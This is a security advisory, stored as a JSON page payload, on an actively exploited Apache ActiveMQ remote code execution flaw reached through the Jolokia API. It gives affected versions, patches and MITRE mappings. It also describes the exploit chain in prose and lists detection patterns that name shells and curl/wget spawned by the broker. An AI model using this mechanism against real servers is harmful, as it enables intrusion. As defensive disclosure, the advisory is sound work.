[{"data":1,"prerenderedAt":139},["ShallowReactive",2],{"article-slug-critical-rce-vulnerability-in-apache-activemq-under-active-exploitation":3,"articles-index":-1},{"id":4,"slug":5,"headline":6,"title":7,"summary":8,"full_report":9,"twitter_post":10,"meta_description":11,"category":12,"severity":16,"entities":17,"cves":31,"sources":37,"events":61,"mitre_techniques":62,"mitre_mitigations":75,"d3fend_countermeasures":106,"iocs":107,"cyber_observables":108,"tags":124,"extract_datetime":130,"article_type":131,"impact_scope":132,"pub_date":41,"reading_time_minutes":138,"createdAt":130,"updatedAt":130},"10a6df2b-c9c3-4823-8915-f77d25809ec7","critical-rce-vulnerability-in-apache-activemq-under-active-exploitation","Critical 13-Year-Old RCE Flaw in Apache ActiveMQ (CVE-2026-34197) Actively Exploited","Unauthenticated RCE Possible in Apache ActiveMQ by Chaining New and Old Vulnerabilities","A critical remote code execution (RCE) vulnerability, CVE-2026-34197, has been discovered in Apache ActiveMQ Classic and is under active exploitation. The flaw, which has reportedly existed for 13 years, allows an authenticated attacker to execute arbitrary code by abusing the Jolokia JMX-HTTP bridge. The risk is severely amplified as this flaw can be chained with a separate vulnerability, CVE-2024-32114, which removes authentication requirements from the API endpoint, allowing for unauthenticated RCE. Apache has released patches, and administrators are urged to update immediately to versions 6.2.3 or 5.19.4 to prevent system compromise.","## Executive Summary\nSecurity researchers have disclosed a **critical** remote code execution (RCE) vulnerability, **[CVE-2026-34197](https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEACTIVEMQ-3142244)**, in **[Apache ActiveMQ](https://activemq.apache.org/)** Classic, a popular open-source message broker. The vulnerability, which has been latent in the codebase for 13 years, is being actively exploited in the wild. The flaw resides in the Jolokia JMX-HTTP bridge and allows an authenticated attacker to achieve RCE. However, the threat is magnified because it can be chained with **CVE-2024-32114**, a flaw that makes the vulnerable endpoint completely unauthenticated. This combination allows attackers to achieve unauthenticated RCE, leading to a full system compromise. The Apache Software Foundation has released patches, and immediate action is required.\n\n## Vulnerability Details\n- **CVE-2026-34197:** This is an improper input validation vulnerability. An authenticated attacker can send a specially crafted request to the `addNetworkConnector()` operation via the Jolokia API endpoint (`/api/jolokia/`). By providing a malicious discovery URI, the attacker can trick the ActiveMQ broker into loading a remote Spring XML application context. This allows them to execute arbitrary Java code within the context of the ActiveMQ process.\n\n- **CVE-2024-32114:** This vulnerability, affecting ActiveMQ versions 6.0.0 through 6.1.1, improperly removes security constraints from the `/api/*` path. The practical effect is that the entire Jolokia API, including the vulnerable `addNetworkConnector()` method, becomes accessible without any authentication.\n\n> The chaining of these two vulnerabilities is what makes this threat so severe. An attacker needs no prior access or credentials to achieve full remote code execution on a vulnerable, internet-facing ActiveMQ server.\n\n## Affected Systems\n- **CVE-2026-34197** affects all versions of Apache ActiveMQ Classic prior to **5.19.4** and versions **6.0.0** through **6.2.2**.\n- The unauthenticated exploit chain is possible on versions **6.0.0** through **6.1.1** where both vulnerabilities are present.\n\n## Exploitation Status\nMultiple security firms, including **[Horizon3.ai](https://horizon3.ai/)** and **[SentinelOne](https://www.sentinelone.com/)**, have confirmed that **CVE-2026-34197** is being actively exploited in the wild. Proof-of-concept (PoC) exploit code is publicly available, lowering the bar for attackers to weaponize this vulnerability.\n\n## Impact Assessment\nSuccessful exploitation of this vulnerability chain results in a complete compromise of the ActiveMQ server. An attacker can:\n- Execute arbitrary commands with the privileges of the ActiveMQ service account.\n- Steal or manipulate all data passing through the message broker.\n- Use the compromised server as a pivot point to attack other systems within the internal network.\n- Deploy ransomware or other malware.\n\nGiven that ActiveMQ is often used as a central messaging backbone for enterprise applications, a compromise could have devastating and widespread consequences.\n\n## Cyber Observables for Detection\nSecurity teams should hunt for evidence of exploitation in their logs:\n\n| Type | Value | Description | Context | Confidence |\n|---|---|---|---|---|\n| `url_pattern` | `/api/jolokia/` | Any access to this URL path should be scrutinized. On patched or properly configured systems, it should not be exposed. | Web server access logs, WAF logs, Reverse proxy logs | high |\n| `string_pattern` | `addNetworkConnector` | The presence of this string in POST data to the Jolokia endpoint is a strong indicator of an exploitation attempt. | WAF logs, Application-level logging | high |\n| `string_pattern` | `discoveryURI` | The `discoveryURI` parameter being used with protocols like `http://` or `ldap://` in a Jolokia request is highly suspicious. | WAF logs, Application-level logging | high |\n| `process_name` | `Unusual child processes of the ActiveMQ Java process` | Monitor for the ActiveMQ JVM spawning shells (`sh`, `bash`, `cmd.exe`) or network tools (`curl`, `wget`). | EDR logs, Host-based monitoring (Sysmon Event ID 1) | high |\n\n## Detection Methods\n1.  **Vulnerability Scanning:** Use a vulnerability scanner to identify all instances of Apache ActiveMQ in your environment and check if they are running a vulnerable version.\n2.  **Log Analysis:** Ingest ActiveMQ and web server logs into a SIEM. Create alerts for any access to the `/api/jolokia/` endpoint, especially if it contains the strings `addNetworkConnector` or `discoveryURI`.\n3.  **Network Traffic Analysis:** Monitor network traffic for outbound connections from ActiveMQ servers to suspicious IP addresses, which could indicate a reverse shell or data exfiltration.\n4.  **D3FEND Techniques:** Implement **[D3-NTA: Network Traffic Analysis](https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis)** to detect the anomalous network connections resulting from a successful RCE. Use **[D3-PA: Process Analysis](https://d3fend.mitre.org/technique/d3f:ProcessAnalysis)** on the host to detect when the Java process spawns unexpected child processes like a shell.\n\n## Remediation Steps\n1.  **Patch Immediately:** The primary remediation is to upgrade to a patched version. The Apache Software Foundation has released:\n    - **ActiveMQ 6.2.3**\n    - **ActiveMQ 5.19.4**\n2.  **Workaround (If Patching is Delayed):** If immediate patching is not possible, restrict access to the ActiveMQ web console. Ensure that it is not exposed to the public internet. Access should be limited to trusted administrative hosts via firewall rules. Additionally, ensure the `jolokia-agent` is not enabled in the configuration if it is not explicitly needed.\n3.  **Verification:** After patching, verify that the vulnerable endpoint is no longer accessible and that the application functions as expected.","🚨 CRITICAL PATCH NOW: A 13-year-old RCE flaw in Apache ActiveMQ (CVE-2026-34197) is actively exploited. It can be chained for unauthenticated RCE. Update to versions 6.2.3 or 5.19.4 immediately. #Apache #ActiveMQ #RCE #CyberSecurity","A critical, 13-year-old remote code execution vulnerability (CVE-2026-34197) in Apache ActiveMQ is being actively exploited, allowing for unauthenticated RCE when chained. Patch immediately.",[13,14,15],"Vulnerability","Patch Management","Cyberattack","critical",[18,21,25,27],{"name":19,"type":20},"Apache Software Foundation","security_organization",{"name":22,"type":23,"url":24},"Apache ActiveMQ","product","https://activemq.apache.org/",{"name":26,"type":20},"Horizon3.ai",{"name":28,"type":29,"url":30},"SentinelOne","vendor","https://www.sentinelone.com/",[32,34],{"id":33,"severity":16},"CVE-2026-34197",{"id":35,"severity":36},"CVE-2024-32114","high",[38,43,46,50,54,57],{"url":39,"title":40,"date":41,"friendly_name":42},"https://www.csa.gov.sg/alerts-advisories/alerts/2026/al-2026-041","Critical Vulnerability in Apache ActiveMQ Classic","2026-04-13","Cyber Security Agency of Singapore",{"url":44,"title":45,"date":41,"friendly_name":26},"https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/","CVE-2026-34197: Apache ActiveMQ RCE via Jolokia API",{"url":47,"title":48,"date":41,"friendly_name":49},"https://www.securityweek.com/rce-bug-lurked-in-apache-activemq-classic-for-13-years/","RCE Bug Lurked in Apache ActiveMQ Classic for 13 Years","SecurityWeek",{"url":51,"title":52,"date":41,"friendly_name":53},"https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEACTIVEMQ-3142244","CVE-2026-34197 - Remote Code Execution in Apache Activemq","Snyk",{"url":55,"title":56,"date":41,"friendly_name":28},"https://www.sentinelone.com/labs/cve-2026-34197-apache-activemq-rce-vulnerability/","CVE-2026-34197: Apache ActiveMQ RCE Vulnerability",{"url":58,"title":59,"date":41,"friendly_name":60},"https://dbugs.org/cve-2026-34197-remote-code-execution-in-apache-activemq/","CVE-2026-34197 — Remote Code Execution in Apache Activemq","dbugs",[],[63,67,71],{"id":64,"name":65,"tactic":66},"T1190","Exploit Public-Facing Application","Initial Access",{"id":68,"name":69,"tactic":70},"T1059","Command and Scripting Interpreter","Execution",{"id":72,"name":73,"tactic":74},"T1210","Exploitation of Remote Services","Lateral Movement",[76,85,89],{"id":77,"name":78,"d3fend_techniques":79,"description":84},"M1051","Update Software",[80],{"id":81,"name":82,"url":83},"D3-SU","Software Update","https://d3fend.mitre.org/technique/d3f:SoftwareUpdate","The primary mitigation is to apply the security patches provided by Apache immediately.",{"id":86,"name":87,"description":88},"M1035","Limit Access to Resource Over Network","As a temporary measure, restrict network access to the ActiveMQ web console and API endpoints, ensuring they are not exposed to the internet.",{"id":90,"name":91,"d3fend_techniques":92,"description":105},"M1042","Disable or Remove Feature or Program",[93,97,101],{"id":94,"name":95,"url":96},"D3-ACH","Application Configuration Hardening","https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening",{"id":98,"name":99,"url":100},"D3-EDL","Executable Denylisting","https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting",{"id":102,"name":103,"url":104},"D3-SCF","System Call Filtering","https://d3fend.mitre.org/technique/d3f:SystemCallFiltering","If the Jolokia agent is not needed for monitoring, disable it in the ActiveMQ configuration to remove the attack surface.",[],[],[109,114,119],{"type":110,"value":111,"description":112,"context":113,"confidence":36},"url_pattern","/api/jolokia/","Access to the Jolokia API endpoint. On a properly secured system, this should not be publicly exposed.","Web server access logs, Reverse proxy logs, WAF logs",{"type":115,"value":116,"description":117,"context":118,"confidence":36},"string_pattern","addNetworkConnector","The presence of this string in a POST request to the Jolokia endpoint is a strong indicator of an exploitation attempt.","WAF logs, Application-level logging with POST body inspection",{"type":120,"value":121,"description":122,"context":123,"confidence":36},"process_name","java","Monitor for the ActiveMQ Java process spawning unexpected child processes like sh, bash, cmd.exe, curl, or wget.","EDR logs, Sysmon Event ID 1",[125,126,127,128,129,33],"RCE","Apache","ActiveMQ","Jolokia","zero-day","2026-04-13T15:00:00.000Z","Advisory",{"geographic_scope":133,"industries_affected":134},"global",[135,136,137],"Technology","Finance","Telecommunications",5,1776260622960]